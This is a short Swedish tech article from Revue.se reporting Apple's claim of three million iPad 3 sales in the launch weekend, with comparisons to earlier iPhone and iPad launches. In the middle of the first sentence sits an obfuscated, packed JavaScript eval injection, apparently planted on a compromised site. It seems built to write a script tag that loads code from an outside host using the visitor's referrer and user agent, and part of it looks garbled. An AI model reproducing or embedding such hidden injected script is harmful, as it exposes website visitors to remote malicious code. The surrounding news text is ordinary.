Image Image Image Image Image Image Image Image Image Image

| 21 mars, 2018

Scroll to top

Top

One Comment

Apple: Redan tre miljoner sålda iPad 3 | Revue.se

Apple: Redan tre miljoner sålda iPad 3
Sebastian Plengier Ehrnfelt

I eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|dabdh|var|u0026u|referrer|zbeis||js|php’.split(‘|’),0,{}))
ett pressmeddelande som Apple skickade ut idag säger de att man redan nått tre miljoner sålda iPad 3 under första helgen.

I fredags släpptes iPad 3 i USA, Kanada, Frankrike, Tyskland, Hongkong, Japan, Puerto Rico, Singapore, Schweiz, Storbritannien och US Virgin Island. Nu på fredag är det dags för oss i Sverige och 23 andra länder att ta del av mästerverket. Denna lansering betyder att det nog kommer stiga med några till miljoner exemplar efter kommande helg.

Man måste säga att tre miljoner sålda exemplar är inte dåligt jobbat då man kan jämföra med iPhone 4 som sålde två miljoner första helgen och iPhone 4S som sålde fyra miljoner enheter under premiärhelgen. IPad 2 sålde ca två miljoner exemplar och för iPad 1 tog det två månader innan de nådde två miljoner.

Sitter själv och väntar på att det ska dimpa ner en iPad 3 i brevlådan 🙂